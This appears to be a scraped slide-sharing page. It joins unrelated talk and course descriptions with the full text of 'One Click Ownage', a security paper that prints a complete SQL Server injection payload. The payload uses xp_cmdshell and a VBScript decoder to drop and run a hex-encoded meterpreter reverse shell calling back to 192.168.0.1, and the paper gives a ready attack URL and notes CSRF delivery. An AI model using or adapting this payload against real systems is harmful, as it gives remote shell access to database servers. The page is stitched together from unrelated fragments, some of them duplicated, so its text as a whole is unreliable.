Suivez le périple d'une log depuis son émission, jusqu'à sa destination finale. Un parcourt semé d’embûches pour sauver la belle application du méchant NullPointor. Des courses poursuites à plus 10000 messages/s dans le dédale des systèmes distribués. Acteurs: Logback le faillot, Filebeat l'espion, Kafka le transporteur, Elasticsearch.... Costumes et Maquillage: Logstash
Il s'agit d'un retour d'expérience sur la configuration et l'exploitation d'un pipeline de données (des logs, des métriques...). A partir des problèmes rencontrés en production, j'expliquerai le fonctionnement interne des outils utilisés, pour vous permettre d'éviter les même écueils. Je m’intéresserai à des problématiques comme la fiabilité (perte de messages), la résilience, la performance ou la sécurité.
MixIT conference 2017
https://mixitconf.org/2017/l-odyssee-de-la-log
Suivez le périple d'une log depuis son émission, jusqu'à sa destination finale. Un parcourt semé d’embûches pour sauver la belle application du méchant NullPointor. Des courses poursuites à plus 10000 messages/s dans le dédale des systèmes distribués. Acteurs: Logback le faillot, Filebeat l'espion, Kafka le transporteur, Elasticsearch.... Costumes et Maquillage: Logstash
Il s'agit d'un retour d'expérience sur la configuration et l'exploitation d'un pipeline de données (des logs, des métriques...). A partir des problèmes rencontrés en production, j'expliquerai le fonctionnement interne des outils utilisés, pour vous permettre d'éviter les même écueils. Je m’intéresserai à des problématiques comme la fiabilité (perte de messages), la résilience, la performance ou la sécurité.
MixIT conference 2017
https://mixitconf.org/2017/l-odyssee-de-la-log
The slides from my July Django-District presentation. It shows some of the basics of using the new fabric. I have uploaded the example fabfile.py to slideshare as well.
Linux Commands mentioned here includes basic as well advanced linux commands which we use on a daily basis. These commands can also help you to crack interview.
maXbox Starter 42 Multiprocessing Programming Max Kleiner
If the system running your program has multiple processors, you can improve performance by dividing the work into
several threads and letting them run simultaneously on separate processors or cores.
We show the function and examples to work with it!
The slides from my July Django-District presentation. It shows some of the basics of using the new fabric. I have uploaded the example fabfile.py to slideshare as well.
Linux Commands mentioned here includes basic as well advanced linux commands which we use on a daily basis. These commands can also help you to crack interview.
maXbox Starter 42 Multiprocessing Programming Max Kleiner
If the system running your program has multiple processors, you can improve performance by dividing the work into
several threads and letting them run simultaneously on separate processors or cores.
We show the function and examples to work with it!
I am Irene. I am a Computer Science Assignment Help Expert at programminghomeworkhelp.com. I hold a Ph.D. in Computer Science from, California Institute of Technology. I have been helping students with their homework for the past 8 years. I solve assignments related to Computer Science.
Visit programminghomeworkhelp.com or email support@programminghomeworkhelp.com.
You can also call on +1 678 648 4277 for any assistance with Computer Science assignments.
I am Joe L. I am a Computer Science Assignment Help Expert at programminghomeworkhelp.com. I hold a Ph.D. in Programming from, University of Chicago, USA. I have been helping students with their homework for the past 9 years. I solve assignments related to Computer Science.
Visit programminghomeworkhelp.com or email support@programminghomeworkhelp.com.
You can also call on +1 678 648 4277 for any assistance with Computer Science assignments.
I am Anne L. I am an Operating System Assignment Expert at programminghomeworkhelp.com. I hold a Ph.D. in Programming, Auburn University, USA. I have been helping students with their homework for the past 8 years. I solve assignments related to Operating systems.
Visit programminghomeworkhelp.com or email support@programminghomeworkhelp.com.
You can also call on +1 678 648 4277 for any assistance with Operating System Assignments.
ironSource's security application expert, Tomer Zait, shares his insights on engineering in the stack. Tomer, an Ort Singalovsky alumnus himself, gave this presentation to the Ort Singalovsky students on their tour of ironSource's headquarters in Tel Aviv.
Want to learn more about ironSource? Visit our website: www.ironsrc.com
Follow us on Twitter @ironSource
ironSource is looking for new talent! Check out our openings: http://bit.ly/Work-at-ironSource
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docxkarlhennesey
Part 4: Scripting and Virtualization (due Week 7)Objectives
1. To learn scripting on Windows and Linux
2. To add virtualization with a Linux distributionStepsPart 1—Windows Scripting
Basic Script: Scripting is useful for small programming projects or quick tasks. Often, these programs are short and meant for small problems. Unlike compiled programming languages, scripting languages are generally interpreted. Batch files or scripts are created to automate tasks and may contain several commands in one file. Scripts can be created in Notepad. These are short files that run each command in sequence at file execution. The windows command-line interface can be used to run scripts.
Below are some commands.
Echo = Displays a message in the batch file
Echo. displays a blank line
@command turns off the display of the current command
@echo off = does not echo back text
cls = clears your screen
:: = Adds comments to your code; this line will not be displayed
Start = used to start a windows application
Creating a Basic Script
cls
@echo off
::Your Name
echo "Creating a data dump file"
ipconfig /all > C:\Scripts\config_info.txt
echo end of script
Open Notepad by going to Start-> All Programs -> Accessories-> Notepad.
Type the above script into Notepad.
Create a directory named Scripts on the C:\ drive. Save this file in the C:\Scripts folder as myscript.cmd.
Do not close your Notepad file. To run, open a command prompt by typing cmd in the Search Programs and Files box when you click the Start button or search for cmd.
Change directory to the C:\Scripts folder by typing the following.
cd c:\Scripts
Then type in the following.
myscript.cmd
The script should run and will create a file.
Use the dir command to see what files are created.
Keep both the Notepad file and the command prompt open for the next step.
You can also shut down a computer from a script. This is helpful for remote shutdown in a networking situation. Add the following commands to your script and save it in Notepad. (Note: The ping command, though normally used for networking, here waits 4 seconds.)
shutdown /s /t 60 /c "Local shutdown in 1 minute!"
ping -w 1000 0.0.0.0 > nul
shutdown /a
echo "Shutdown has been aborted"
Click back to the command prompt.
Type in myscript.cmd to run the script.
You should see the script attempt to shut down, then abort the shutdown.
Keep both your Notepad and command prompt open.
Environment variables are built-in system variables available for all Windows processes describing users, paths, and so on.
Some common environment variables are as follows.
%PATH% = contains a list of directories with executable files, separated by semicolons. To add a path:
SET PATH = %PATH%;C:\Windows\Eclipse
%DATE% and %TIME% = current date and time
%RANDOM% = returns a random number between 0 and 32767
%WINDIR% = points to the windows directory C:\Windows
%PATHEXT% = displays executable file extensions ie .com, .exe, .bat, .cmd, .vbs, .vbe, ...
An introduction to the Docker concept. Experiences with ASP.NET Core and Docker, How Docker can help produce modular deployments for ASP.NET web applications. Presented at Vermont Code Camp #8, UVM, Burlington VT, September 17, 2016
1-Information sharing
2-Computation speedup
3-Modularity
4-Convenience
5-allows exchanged data and informations
Two IPC Models
1. Shared memory- is an OS provided abstraction which allows a memory region to be simultaneously accessed by multiple programs with an intent to provide communication among them. One process will create an area in RAM which other processes can accessed
2. Message passing - is a form of communication used in interprocess communication. Communication is made by the sending of messages to recipients. Each process should be able to name the other processes. The producer typically uses send() system call to send messages, and the consumer uses receive()system call to receive messages
Shared memory
Faster than message passing
After establishing shared memory, treated as routine memory accesses
Message passing
Useful for exchanging smaller amounts of data
Easy to implement, but more time-consuming task of kernel intervention
Bounded-Buffer Problem Producer Process
do {
...
produce an item in nextp
...
wait(empty);
wait(mutex);
...
add nextp to buffer
...
signal(mutex);
signal(full);
} while (true);
Bounded-Buffer Problem Consumer Process
do {
wait(full);
wait(mutex);
...
remove an item from buffer to nextc
...
signal(mutex);
signal(empty);
...
consume the item in nextc
...
} while (true);
client-server model, the client sends out requests to the server, and the server does some processing with the request(s) received, and returns a reply (or replies)to the client.
Since Socket can be described as end-points for communication. we could imagine the client and server hosts being connected by a pipe through which data-flow takes place.
1-sockets use a client-server while Server waits for incoming client requests by listening to a specified port.
2-After receiving a request, the server accepts a connection from the client socket to complete the connection
3-then Remote procedure call (RPC) abstracts procedure call mechanism for use between systems with network connections
4-and pipes acts as a conduit allowing two processes to communicate
A process is different than a program
- Program is static code and static data
- Process is Dynamic instance of code and data
-Program becomes process when executable file loaded into memory
No one-to-one mapping between programs and processes
-can have multiple processes of the same program
-one program can invoke multiple process
Execution of program started via GUI mouse clicks and command line entry of its name
The process state transition
As a process executes, The process is being created, then The process is waiting to be assigned to a processor therefore, Instructions are being executed then The process is waiting for some event to occur,thereafter The process has finished exec ...
Student NameClassDateVBScript IP File ReportIn the space provide.docxemelyvalg9
Student NameClassDateVBScript IP File Report
In the space provided below, copy and paste your IP_FileWrite.vbs program sourcecode. If it doesn’t fit, use the next page for the continuation of your program sourcecode.
In the space provided below to copy and paste the remainder of your IP_FileWrite.vbs sourcecode if it did not fit in the first textbox.
In the space provided below, copy and paste the RUN of your IP_FileWrite.vbs program. Also include the directory listing of all .csv files:
In the space provided below, copy and paste your IP_AppendRead.vbs program sourcecode. If it doesn’t fit, use the next page for the continuation of your program sourcecode.
In the space provided below to copy and paste the remainder of your IP_AppendRead.vbs sourcecode if it did not fit in the first textbox.
In the space provided below, copy and paste the RUN of your IP_AppendRead.vbs program.
1
COMP230_W6_IP_File_Report.docx Revision Date: 1213
VBScript IP File Lab
Objectives
In this lab, students will complete the following objectives.
· Create a VBScript program using NotePad++.
· Write a two-dimensional array of IP addresses to a text file.
· Read the IP Addresses text file into a script.
· Append new Room/PC/IP address data to the text file.
· Use the object Scripting.FileSystemObject.
Lab Diagram
During your session you will have access to the following lab configuration.
Connecting to your lab
For this lab, we will only need to connect to Vlab-PC1.
· Vlab-PC1
To start simply click on the named Workstation from the device list (located on the left hand side of the screen) and click the Power on from the in tools bar. In some cases the devices may power on automatically.
During the boot up process an activity indicator will be displayed in the name tab:
· Black - Powered Off
· Orange - Working on your request
· Green - Ready to access
If the remote console is not displayed automatically in the main window (or popup) click the Connect icon located in the tools bar to start your session.
If the remote console does not appear please try the following option:
· Switch between the HTML 5 and Java client versions in the tools bar.
In the event this does not resolve your connectivity problems please visit our Help / Support pages for additional resolution options.
Task 1: Create the IP_FileWrite.vbs Program
Note: All captures must be text only—DO NOT capture the NotePad++ application window or the command prompt window. Use copy and paste of text only.
1) Open NotePad++ and from the menu, select File/Open. Open the file IP_File_start.vbs in the C:\comp230 directory. If you do not see this file, you can download it and extract it from the eCollege Doc Sharing file IP_File_start.zip.
Modify the Programmer Header as needed and Save As the VBScript file as IP_FileWrite.vbs.
We are using the array of IP addresses that was used in Lab 4. The line dim ipAddress(5,3) declare 6x4 two-dimensio.
사내 발표자료 겸 만들었는데, ECS Fargate를 이용하실 분들이라면, 편리하게 쓰실 수 있도록 최대한 상세하게 만들어 보았습니다.
사실 CloudFormation 등 배포는 좀 더 편리하게 할 수 있지만, 회사 사정도 있고, 제가 일단 그런 기술을 너무 늦게 알았기 때문에 다루지는 않았습니다.
Search and Society: Reimagining Information Access for Radical FuturesBhaskar Mitra
The field of Information retrieval (IR) is currently undergoing a transformative shift, at least partly due to the emerging applications of generative AI to information access. In this talk, we will deliberate on the sociotechnical implications of generative AI for information access. We will argue that there is both a critical necessity and an exciting opportunity for the IR community to re-center our research agendas on societal needs while dismantling the artificial separation between the work on fairness, accountability, transparency, and ethics in IR and the rest of IR research. Instead of adopting a reactionary strategy of trying to mitigate potential social harms from emerging technologies, the community should aim to proactively set the research agenda for the kinds of systems we should build inspired by diverse explicitly stated sociotechnical imaginaries. The sociotechnical imaginaries that underpin the design and development of information access technologies needs to be explicitly articulated, and we need to develop theories of change in context of these diverse perspectives. Our guiding future imaginaries must be informed by other academic fields, such as democratic theory and critical theory, and should be co-developed with social science scholars, legal scholars, civil rights and social justice activists, and artists, among others.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
One Click Ownage
1. ONE CLICK OWNAGE
Ferruh Mavituna
ferruh@mavituna.com - http://english.mavituna.com
Idea of this attack is very simple. Getting a reverse shell from an SQL Injection with one request without using
an extra channel such as TFTP, FTP to upload the initial payload.
For example the following text will throw a reverse shell to 192.168.0.1:
1;exec master..xp_cmdshell 'echo
d="4D5A900003x0304x03FFFFx02B8x0740x2380x030E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F
742062652072756E20696E20444F53206D6F64652E0D0D0A24x075045x024C010300176FAD27x08E0000F030B0102380010x0310x03
50x024062x0360x0370x0440x0210x0302x0204x0301x0304x0880x0310x0602x0520x0210x0410x0210x0610x0C70x02ACx7355505
830x0550x0310x0702x0E80x02E055505831x0510x0360x0304x0302x0E40x02E055505832x0510x0370x0302x0306x0E40x02C0332
E303300555058210D090209F0B5FC11B9DF8C86A641x021D02x0326x0226x02EDB7FFDBFF31C0B9002040006830100464FF30648920
506A406812x02DA2FE4F65151E9x023C90FF253C402916B205DB07x020F40882A4BE6000700FFFFEE01FCE8560B535556578B6C2418
8B453C8B54057801FFFFFFE5EA8B4A5A2001EBE332498B348B01EE31FFFC31C0AC38E07407C1CFDB97EDFF0D01C7EBF23B7C241475E
12324668B0C4B081CFFDFDE2E8B0429E8EB02285F5E5D5BC208005E6A305964FB7F7BFB8B198B5B0C021C8B1B040853688E4E0EECFF
D689C709F3DFBE7C54CAAF9181EC00018A5057565389E5E81FFFFFFF5D900EB61918E7A41970E9ECF9AA60D909F5ADCBEDFC3B57533
25F33FFFFFFFF32005B8D4B1851FFD789DF89C38D75146A05595153FF348FFF55045989048EE273DDB6FDF22B2754FF370D28835000
40010C6FFFFF6D246D68C0A801976802001A0A89E16A10515714206A40B5B6BDFB5E56C1E6060308566A00100C5006A8B2E0AE851A1
8FFD3B81141B62A1F83AA0009C23617C974404858400F84CE54B60340615516A0A80C7FD90C14443C30014578697450E2DDBFFC726F
636573735669727475616C0F746563740FF92FCF1050454C010300176FAD27E000788334FF0F030B0102380002221003EDBAB724F20
B1F04060100DF7B369B07501775F90600205830D96037103F103D85A9485E84002E02857DC39E786090AC02236FD9FBBBB9602E7264
6174610C03EC9B9D3D64C2402E692784104B4188293B2427C029x03B82A070012x02FFx0E60BE156040008DBEEBAFFFFF57EB0B908A
064688074701DB75078B1E83EEFC11DB72EDB801x0301DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E8
03720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEF
C11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF
908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B901x038A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1
C01086C429F880EBE801F0890783C70588D8E2D98DBE0040x028B0709C0743C8B5F048D84300060x0201F35083C708FF962860x0295
8A074708C074DC89F95748F2AE55FF962C60x0209C07407890383C304EBE1FF963C60x028BAE3060x028DBE00F0FFFFBB0010x02505
46A045357FFD58D879F01x0280207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E938ACFFFFx444470x02287
0x165070x025E70x026E70x027E70x028C70x029A70x064B45524E454C33322E444C4Cx024C6F61644C69627261727941x024765745
0726F6341646472657373x025669727475616C50726F74656374x025669727475616C416C6C6F63x025669727475616C46726565x03
4578697450726F63657373xFFx5A":W CreateObject^("Scripting.FileSystemObject"^).GetSpecialFolder^(2^) ^&
"wr.exe", R^(d^):Function R^(t^):Dim Arr^(^):For i=0 To Len^(t^)-1 Step 2:Redim Preserve
Ar^(S^):FB=Mid^(t,i+1,1^):SB=Mid^(t,i+2,1^):HX=FB ^& SB:If FB="x" Then:NB=Mid^(t,i+3,1^):L=H^(SB ^&
NB^):For j=0 To L:Redim Preserve Ar^(S+^(j*2^)+1^):Ar^(S+j^)=0:Ar^(S+j+1^)=0:Next:i=i+1:S=S+L:Else:If
Len^(HX^)^>0 Then:Ar^(S^)=H^(HX^):End If:S=S+1:End If:Next:Redim Preserve Ar^(S-2^):R=Ar:End
Function:Function H^(HX^):H=CLng^("&H" ^& HX^):End Function:Sub W^(FN, Buf^):Dim aBuf:Size =
UBound^(Buf^):ReDim aBuf^(Size2^):For I = 0 To Size - 1 Step
2:aBuf^(I2^)=ChrW^(Buf^(I+1^)*256+Buf^(I^)^):Next:If I=Size Then:aBuf^(I2^)=ChrW^(Buf^(I^)^):End
If:aBuf=Join^(aBuf,""^):Set bS=CreateObject^("ADODB.Stream"^):bS.Type=1:bS.Open:With
CreateObject^("ADODB.Stream"^):.Type=2:.Open:.WriteText aBuf:.Position=2:.CopyTo bS:.Close:End
With:bS.SaveToFile FN,2:bS.Close:Set bS=Nothing:End Sub>p.vbs && p.vbs && %TEMP%wr.exe'
Similar attacks have been around for a while, but implementations are either overly complex 1 or relies on
installed tools 2 and lack of outbound filtering in the target system. Advantages of this one request approach
are:
It's only one request therefore faster,
1
Using debug.exe
2
FTP, TFTP, debug.exe
1 Ferruh Mavituna, One Click Ownage
2. Simple, you don't need a tool you can do it manually by using your browser or a simple MITM proxy,
just copy paste the payload,
CSRF(able), It's possible to craft a link and carry out a CSRF attack that will give you a reverse shell 3,
It's not fixed, you can change the payload,
It's short, Generally not more than 3.500 characters, 4
Doesn't require any application on the target system like FTP, TFTP or debug.exe5,
Easy to automate.
T ARGET S YSTEM
This attack only works on SQL Injections in SQL Server and SA (admin priviliges) connections. Obviously the
theory can be applied other databases.
I MPLEMENTATION
Obvious problem with transferring the initial binary file over HTTP is how to write binary files in an SQL
Injection. There are several tricks to accomplish this but none of them are really simple. Since we can't directly
carry out and write binary data to the disk we need to convert it to some other format such as base64 and
then we need to decode it and write as a binary on the target system.
To overcome this problem I used VBScript to encode and decode the binary data. Since VBScript can be found
in all Windows systems by default and never seen that it's removed, it's pretty reliable and powerful enough.
1. Generate a hex representation of the "shell.exe" in the local system,
2. Write a VBScript that can process this hex string and generate a valid binary file,
3. Put all this together into one line,
4. Carry out the SQL injection with this one line.
3
If CSRF attack uses GET requests, attack should be shorter than 2083 characters to
work in Internet Explorer, all other common browser supports up to 8000
characters. Source: http://www.boutell.com/newfaq/misc/urllength.html
4
All web servers supports GET requests up to 8000 characters unless they have
hardened with a tool for this. POST requests should work all the time. Source:
http://www.boutell.com/newfaq/misc/urllength.html
5
Other than cscript.exe, ships by default in all Windows OS and no one remove it.
csript.exe is the tool responsible to execute VBScript and JScript scripts in Windows.
Most of the system won't even work without it. Installers and many other
applications rely on it actively, so it's a core component of the OS.
2 Ferruh Mavituna, One Click Ownage
3. C RAFTING THE ATTACK
Crafting this attack requires two scripts, first one will encode the binary as hex string, the second one will be
transferred to the target system to decode this binary and write it to the file system.
1. Generating Hex Representation of the binary
This is an easy one. UPX the original executable (for example a metasploit reverse shell), read the binary and
write it as hex. However even after UPX there is still more space for further optimization. There will be lots of
null characters in the output, so this implementation takes advatage of it and implements a simple
compression and makes the string shorter.
Output of the BuildText.vbs with a sample meterpreter reverse shell:
4D5A900003x0304x03FFFFx02B8x0740x2380x030E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742
062652072756E20696E20444F53206D6F64652E0D0D0A24x075045x024C010300176FAD27x08E0000F030B0102380010x0310x0350x
024062x0360x0370x0440x0210x0302x0204x0301x0304x0880x0310x0602x0520x0210x0410x0210x0610x0C70x02ACx7355505830
x0550x0310x0702x0E80x02E055505831x0510x0360x0304x0302x0E40x02E055505832x0510x0370x0302x0306x0E40x02C0332E30
3300555058210D090209F0B5FC11B9DF8C86A641x021D02x0326x0226x02EDB7FFDBFF31C0B9002040006830100464FF30648920506
A406812x02DA2FE4F65151E9x023C90FF253C402916B205DB07x020F40882A4BE6000700FFFFEE01FCE8560B535556578B6C24188B4
53C8B54057801FFFFFFE5EA8B4A5A2001EBE332498B348B01EE31FFFC31C0AC38E07407C1CFDB97EDFF0D01C7EBF23B7C241475E123
24668B0C4B081CFFDFDE2E8B0429E8EB02285F5E5D5BC208005E6A305964FB7F7BFB8B198B5B0C021C8B1B040853688E4E0EECFFD68
9C709F3DFBE7C54CAAF9181EC00018A5057565389E5E81FFFFFFF5D900EB61918E7A41970E9ECF9AA60D909F5ADCBEDFC3B5753325F
33FFFFFFFF32005B8D4B1851FFD789DF89C38D75146A05595153FF348FFF55045989048EE273DDB6FDF22B2754FF370D28835000400
10C6FFFFF6D246D68C0A801976802001A0A89E16A10515714206A40B5B6BDFB5E56C1E6060308566A00100C5006A8B2E0AE851A18FF
D3B81141B62A1F83AA0009C23617C974404858400F84CE54B60340615516A0A80C7FD90C14443C30014578697450E2DDBFFC726F636
573735669727475616C0F746563740FF92FCF1050454C010300176FAD27E000788334FF0F030B0102380002221003EDBAB724F20B1F
04060100DF7B369B07501775F90600205830D96037103F103D85A9485E84002E02857DC39E786090AC02236FD9FBBBB9602E7264617
4610C03EC9B9D3D64C2402E692784104B4188293B2427C029x03B82A070012x02FFx0E60BE156040008DBEEBAFFFFF57EB0B908A064
688074701DB75078B1E83EEFC11DB72EDB801x0301DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E8037
20DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11
DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908
B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B901x038A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1C01
086C429F880EBE801F0890783C70588D8E2D98DBE0040x028B0709C0743C8B5F048D84300060x0201F35083C708FF962860x02958A0
74708C074DC89F95748F2AE55FF962C60x0209C07407890383C304EBE1FF963C60x028BAE3060x028DBE00F0FFFFBB0010x0250546A
045357FFD58D879F01x0280207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E938ACFFFFx444470x022870x1
65070x025E70x026E70x027E70x028C70x029A70x064B45524E454C33322E444C4Cx024C6F61644C69627261727941x024765745072
6F6341646472657373x025669727475616C50726F74656374x025669727475616C416C6C6F63x025669727475616C46726565x03457
8697450726F63657373xFFx5A
2. Writing the Binary
Generatebinary.vbs writes a new binary to temp folder based on the hex string produced in the first step.
3. Putting it all together
BuildAll.bat batch script will combine the hex string, VBScript then convert them into a one line script. Now all
we need to do append the SQL Injection attack, escape it for "echo" usage and URL encode it.
Final attack would be like this:
http://example.com?sqlinjection.aso?id=1;exec master..xp_cmdshell 'echo
d="4D5A900003x0304x03FFFFx02B8x0740x2380x030E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F
742062652072756E20696E20444F53206D6F64652E0D0D0A24x075045x024C010300176FAD27x08E0000F030B0102380010x0310x03
50x024062x0360x0370x0440x0210x0302x0204x0301x0304x0880x0310x0602x0520x0210x0410x0210x0610x0C70x02ACx7355505
830x0550x0310x0702x0E80x02E055505831x0510x0360x0304x0302x0E40x02E055505832x0510x0370x0302x0306x0E40x02C0332
E303300555058210D090209F0B5FC11B9DF8C86A641x021D02x0326x0226x02EDB7FFDBFF31C0B9002040006830100464FF30648920
506A406812x02DA2FE4F65151E9x023C90FF253C402916B205DB07x020F40882A4BE6000700FFFFEE01FCE8560B535556578B6C2418
8B453C8B54057801FFFFFFE5EA8B4A5A2001EBE332498B348B01EE31FFFC31C0AC38E07407C1CFDB97EDFF0D01C7EBF23B7C241475E
12324668B0C4B081CFFDFDE2E8B0429E8EB02285F5E5D5BC208005E6A305964FB7F7BFB8B198B5B0C021C8B1B040853688E4E0EECFF
D689C709F3DFBE7C54CAAF9181EC00018A5057565389E5E81FFFFFFF5D900EB61918E7A41970E9ECF9AA60D909F5ADCBEDFC3B57533
25F33FFFFFFFF32005B8D4B1851FFD789DF89C38D75146A05595153FF348FFF55045989048EE273DDB6FDF22B2754FF370D28835000
40010C6FFFFF6D246D68C0A801976802001A0A89E16A10515714206A40B5B6BDFB5E56C1E6060308566A00100C5006A8B2E0AE851A1
8FFD3B81141B62A1F83AA0009C23617C974404858400F84CE54B60340615516A0A80C7FD90C14443C30014578697450E2DDBFFC726F
636573735669727475616C0F746563740FF92FCF1050454C010300176FAD27E000788334FF0F030B0102380002221003EDBAB724F20
3 Ferruh Mavituna, One Click Ownage
4. B1F04060100DF7B369B07501775F90600205830D96037103F103D85A9485E84002E02857DC39E786090AC02236FD9FBBBB9602E7264
6174610C03EC9B9D3D64C2402E692784104B4188293B2427C029x03B82A070012x02FFx0E60BE156040008DBEEBAFFFFF57EB0B908A
064688074701DB75078B1E83EEFC11DB72EDB801x0301DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E8
03720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEF
C11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF
908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B901x038A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1
